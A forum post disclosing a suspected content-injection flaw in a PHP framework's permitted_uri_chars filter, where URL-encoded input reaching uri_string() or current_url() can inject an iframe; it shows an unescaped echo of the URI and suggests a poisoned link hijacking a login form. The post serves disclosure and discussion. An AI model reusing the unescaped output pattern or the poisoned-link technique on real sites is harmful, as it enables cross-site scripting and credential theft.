• 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Potential permitted_uri_chars exploit

Forgive me if this has been covered. I did do some searching to see if it have been covered on the forums and google.

Currently permitted_uri_chars allows any url encoded characters to passed straight through to most functions using uri_string();

$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-';

Example of the attack

Given the encoding translation it can be tricky to reproduce. But the above attack will parse an iframe on to any page which calls uri_string() or current_url(), e.g.
<a href="<?php echo uri_string();?>link</a>

Currently I'm looking at removing url encoded characters (%) from the uri. Get vars seem to be unaffected by permitted_uri_chars filter.

This is not a database exploit, but a content insertion exploit.

Thoughts and comments welcome.

Oh if you are seeing iframe, you are seeing it un-encoded (tricky to post in the forums) and will need to url encode everything after view/, before posting into the browser address bar. It's tricky, but once you know how to do it, it's quite easy to html.

Conceivable you could post a poisoned link, which on click replaces a login form using a form action using current_url()

Digg   Delicious   Reddit   Facebook   Twitter   StumbleUpon  

  Theme © 2014 iAndrew  
Powered By MyBB, © 2002-2021 MyBB Group.